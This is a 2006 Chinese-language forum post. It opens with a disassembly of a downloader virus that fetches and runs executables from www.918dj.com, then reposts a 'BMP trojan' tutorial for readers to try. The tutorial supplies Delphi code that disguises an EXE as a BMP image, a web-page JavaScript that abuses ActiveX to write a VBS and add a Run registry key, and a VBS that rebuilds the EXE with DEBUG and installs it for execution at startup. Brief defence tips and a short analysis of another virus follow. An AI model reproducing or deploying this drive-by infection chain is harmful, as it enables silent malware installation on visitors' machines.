查看單個文章
舊 2006-03-06, 06:56 PM   #7 (permalink)
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

:00403648 55 push ebp
:00403649 8BEC mov ebp, esp
:0040364B 83C4F0 add esp, FFFFFFF0
:0040364E 53 push ebx
:0040364F 56 push esi
:00403650 57 push edi
:00403651 B8F0354000 mov eax, 004035F0
:00403656 E8B9FCFFFF call 00403314
:0040365B 33C0 xor eax, eax
:0040365D 55 push ebp
:0040365E 68B1364000 push 004036B1
:00403663 64FF30 push dword ptr fs:[eax]
:00403666 648920 mov dword ptr fs:[eax], esp

* Possible StringData Ref from Code Obj ->"C:\windows\winsoft1.exe"
|
:00403669 BACC364000 mov edx, 004036CC

* Possible StringData Ref from Code Obj ->"http://www.918dj.com/IESP1.exe"
|
:0040366E B8EC364000 mov eax, 004036EC
:00403673 E8B0FEFFFF call 00403528
:00403678 84C0 test al, al
:0040367A 740C je 00403688
:0040367C 6A00 push 00000000

* Possible StringData Ref from Code Obj ->"C:\windows\winsoft1.exe"
|
:0040367E 680C374000 push 0040370C

* Reference To: KERNEL32.WinExec, Ord:0000h
|
:00403683 E840FDFFFF Call 004033C8

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040367A(C)
|

* Possible StringData Ref from Code Obj ->"C:\windows\winsoft2.exe"
|
:00403688 BA2C374000 mov edx, 0040372C

* Possible StringData Ref from Code Obj ->"http://www.918dj.com/IESP2.exe"
|
:0040368D B84C374000 mov eax, 0040374C
:00403692 E891FEFFFF call 00403528
:00403697 84C0 test al, al
:00403699 740C je 004036A7
:0040369B 6A00 push 00000000

* Possible StringData Ref from Code Obj ->"C:\windows\winsoft2.exe"
|
:0040369D 686C374000 push 0040376C

* Reference To: KERNEL32.WinExec, Ord:0000h
|
:004036A2 E821FDFFFF Call 004033C8

很簡單,該病毒下載http://www.918dj.com/IESP1.exe或者...2.exe並執行
他還下載兩個病毒:iesp1.exe和iesp2.exe,其中iesp2.exe是自解壓rar文件,裡面好像居然還有還原精靈
這個病毒,把 vb6 執行庫和還原精靈都下下來了,要是真的執行還原精靈,就比你碰到的更惡毒了

其實他的真名叫:bmp木馬
其實現方法如下 轉載:
首先說明這不是什麼新的東西,但最近有人說我們沒有,那就隨便寫編文章放上來了,大家自己試驗一下. 何謂BMP網頁木馬?它和過去早就用臭了的MIME頭漏洞的木馬不同,MIME木馬是把一個EXE文件用MIME編碼為一個EML(OUT LOOK郵件)文件,放到網頁上利用IE和OE的編碼漏洞實現自動下載和執行.

然而BMP木馬就不同,它把一個EXE文件偽裝成一個BMP圖片文件,欺騙IE自動下載,再利用網頁中的javascript指令碼搜尋客戶端的Internet臨時資料夾,找到下載後的BMP文件,把它拷貝到TEMP目錄.再編寫一個指令碼把找到的BMP文件用DEBUG還原成EXE,並把它放到註冊表啟動項中,在下一次開機時執行.但是這種技術只能在9X下發揮作用,對於2K,XP來說是無能為力了.

看上去好像很複雜,下面我們一步一步來:
1) EXE變BMP的方法.
大家自己去查查BMP文件資料就會知道,BMP文件的文件頭有54個字元,簡單來說裡面包含了BMP文件的長寬,位數,文件大小,資料區長度,我們只要在EXE文件的文件頭前面增加相應的BMP文件頭(當然BMP文件頭裡面的資料要符合EXE文件的大小啦),這樣就可以欺騙IE下載該BMP文件,開始我們用JPG文件做過試驗,發現如果文件頭不正確的話,IE是不會下載的,轉換程式碼如下:

program exe2bmp;

uses
Windows,
SysUtils;

var len,row,col,fs: DWORD;
buffer: array[0..255]of char;
fd: WIN32_FIND_DATA;
h,hw: THandle;

begin
if (ParamStr(1)<>'''') and(ParamStr(2)<>'''') then begin //如果執行後沒有兩個參數則結束
if FileExists(ParamStr(1)) then begin
FindFirstFile(Pchar(ParamStr(1)),fd);
fs:=fd.nFileSizeLow;
col := 4;
while true do begin
if (fs mod 12)=0 then begin
len:=fs;
end else len:=fs+12-(fs mod 12);
row := len div col div 3;
if row>col then begin
col:=col+4;
end else Break;
end;
FillChar(buffer,256,0);
{一下為BMP文件頭資料}
Buffer[0]:=''B'';Buffer[1]:=''M'';
PDWORD(@buffer[18])^:=col;
PDWORD(@buffer[22])^:=row;
PDWORD(@buffer[34])^:=len;
PDWORD(@buffer[2])^:=len+54;
PDWORD(@buffer[10])^:=54;
PDWORD(@buffer[14])^:=40;
PWORD(@buffer[26])^:=1;
PWORD(@buffer[28])^:=24;
{寫入文件}
hw:=CreateFile(Pchar(ParamStr(2)),GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,nil,CREATE_ALWAYS,0,0);
h:=CreateFile(Pchar(ParamStr(1)),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,nil,OPEN_EXISTING,0,0);
WriteFile(hw,buffer,54,col,0);
repeat
ReadFile(h,buffer,256,col,0);
WriteFile(hw,buffer,col,col,0);
untilcol<>256;
WriteFile(hw,buffer,len-fs,col,0);
CloseHandle(h);
CloseHandle(hw);
end;
end;
end.


以上程式碼可以在DELPHI4,5,6中編譯 ,就可以得到一個exe2bmp.exe文件.大家開啟MSDOS方式,輸入
exe2bmp myexe.exe mybmp.bmp
Enter鍵就可以把第二個參數所指定的EXE文件轉換成BMP格式.
接著就是把這個BMP圖片放到網頁上了,如果大家開啟過這張圖片的話,一定發現這張BMP又花,顏色又單調.所以大家放在網頁上最好用這樣的格式
<img srd="mybmp.bmp" higth="0" width="0">


以下是放在網頁上的指令碼
document.write('' '');
function docsave()
{
a=document.applets[0];
a.setCLSID(''{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}'');
a.createInstance();
wsh=a.GetObject();
a.setCLSID(''{0D43FE01-F093-11CF-8940-00A0C9054228}'');
a.createInstance();
fso=a.GetObject();
var winsys=fso.GetSpecialFolder(1);
var vbs=winsys+''\\s.vbs'';
wsh.RegWrite
(''HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs'',''wscript ''+''"''+vbs+''" '');
var st=fso.CreateTextFile(vbs,true);
st.WriteLine(''Option Explicit'');
st.WriteLine(''Dim FSO,WSH,CACHE,str'');
st.WriteLine(''Set FSO = CreateObject("Scripting.FileSystemObject")'');
st.WriteLine(''Set WSH = CreateObject("WScript.Shell")'');
st.WriteLine(''CACHE=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellFolders\\快取")'');
st.WriteLine(''wsh.RegDelete("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs")'');
st.WriteLine (''wsh.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\tmp","tmp.exe"'');
st.WriteLine(''SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"'');
st.WriteLine(''WScript.Quit()'');
st.WriteLine(''Function SearchBMPFile(Folder,fname)'');
st.WriteLine('' Dim SubFolder,File,Lt,tmp,winsys'');
st.WriteLine('' str=FSO.GetParentFolderName(folder) & "\\" & folder.name & "\\" & fname'');
st.WriteLine('' if FSO.FileExists(str) then'');
st.WriteLine('' tmp=fso.GetSpecialFolder(2) & "\\"'');
st.WriteLine('' winsys=fso.GetSpecialFolder(1) & "\\"'');
st.WriteLine('' set File=FSO.GetFile(str)'');
st.WriteLine('' File.Copy(tmp & "tmp.dat")'');
st.WriteLine('' File.Delete'');
st.WriteLine('' set Lt=FSO.CreateTextFile(tmp & "tmp.in")'');
st.WriteLine('' Lt.WriteLine("rbx")'');
st.WriteLine('' Lt.WriteLine("0")'');
st.WriteLine('' Lt.WriteLine("rcx")'');
st.WriteLine('' Lt.WriteLine("1000")'');
st.WriteLine('' Lt.WriteLine("w136")'');
st.WriteLine('' Lt.WriteLine("q")'');
st.WriteLine('' Lt.Close'');
st.WriteLine('' WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out",false,6'');
st.WriteLine('' On Error Resume Next '');
st.WriteLine('' FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")'');
st.WriteLine('' FSO.GetFile(tmp & "tmp.dat").Delete'');
st.WriteLine('' FSO.GetFile(tmp & "tmp.in").Delete'');
st.WriteLine('' FSO.GetFile(tmp & "tmp.out").Delete'');
st.WriteLine('' end if'');
st.WriteLine('' If Folder.SubFolders.Count <> 0 Then'');
st.WriteLine('' For Each SubFolder In Folder.SubFolders'');
st.WriteLine('' SearchBMPFile SubFolder,fname'');
st.WriteLine('' Next'');
st.WriteLine('' End If'');
st.WriteLine(''End Function'');
st.Close();
}
setTimeout(''docsave()'',1000);

把該指令碼儲存為"js.js",在網頁中插入:
<script src="js.js"></script>

該指令碼主要會在本機機器的SYSTEM目錄下產生一個「S.VBS」文件,該指令碼文件會在下次開機時自動執行。主要用於從臨時目錄中找出mybmp[1].bmp文件。
「S.VBS」文件主要內容如下:

Option Explicit
Dim FSO,WSH,CACHE,str
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\快取")
wsh.RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs")
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tmp","tmp.exe"
SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"
WScript.Quit()
Function SearchBMPFile(Folder,fname)
Dim SubFolder,File,Lt,tmp,winsys
''從臨時資料夾中搜尋目標BMP圖片
str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname
if FSO.FileExists(str) then
tmp=fso.GetSpecialFolder(2) & "\"
winsys=fso.GetSpecialFolder(1) & "\"
set File=FSO.GetFile(str)
File.Copy(tmp & "tmp.dat")
File.Delete
''產生一個DEBUG指令碼
set Lt=FSO.CreateTextFile(tmp & "tmp.in")
Lt.WriteLine("rbx")
Lt.WriteLine("0")
Lt.WriteLine("rcx")
''下面一行的1000是十六進制,換回十進制是4096(該數位是你的EXE文件的大小)
Lt.WriteLine("1000")
Lt.WriteLine("w136")
Lt.WriteLine("q")
Lt.Close
WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp &"tmp.in>" & tmp & "tmp.out",false,6
On Error Resume Next
FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")
FSO.GetFile(tmp & "tmp.dat").Delete
FSO.GetFile(tmp & "tmp.in").Delete
FSO.GetFile(tmp & "tmp.out").Delete
end if
If Folder.SubFolders.Count <> 0 Then
For Each SubFolder In Folder.SubFolders
SearchBMPFile SubFolder,fname
Next
End If
End Function

這個指令碼會找出在臨時資料夾中的bmp文件,並產生一個DEBUG的指令碼,執行時會自動從BMP文件54字元處讀去你指定大小的資料,並把它儲存到tmp.dat中.後面的指令碼再把它複製到SYSTEM的目錄下.這個被還原的EXE文件會在下次重新啟動的時候執行.這就是BMP木馬的基本實現程序.
詳細指令碼程式碼請參考http://hotsky.363.net

防範方法:
最簡單,移除或改名wscrpit.exe文件和DEBUG 文件;
安裝有效的殺毒軟體,因為這些指令碼有好多殺毒軟體已經可以查出來了.
在條件允許的情況下,安裝WIN2K SP3,盡量避免去一些不名來歷的網站.

剛剛淺淺的看了一下sendmess.exe病毒
很老了。我在學校機房上網,沒殺毒軟體。
sendmess.exe執行後將邦在自身尾部的qqmess.dll copy到c:\windows\system下並載入。將自身拷到c:\windows下,將
import表作為文本文件命名為qq32.ini拷到c:\windows下。
在註冊表HKLM\Software\Microsoft\windows\currentversion\run下新增名為qq的鍵,指向c:\windows\sendmess.exe使之開機時執行
qq32.ini中所存的文本為qq發訊息時候面加的不健康網站的網址。
並將主頁改為此網址。
殺它很簡單:od附加上sendmess.exe.結束行程。也可以用peid.
__________________
http://bbsimg.qianlong.com/upload/01/08/29/68/1082968_1136014649812.gif
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次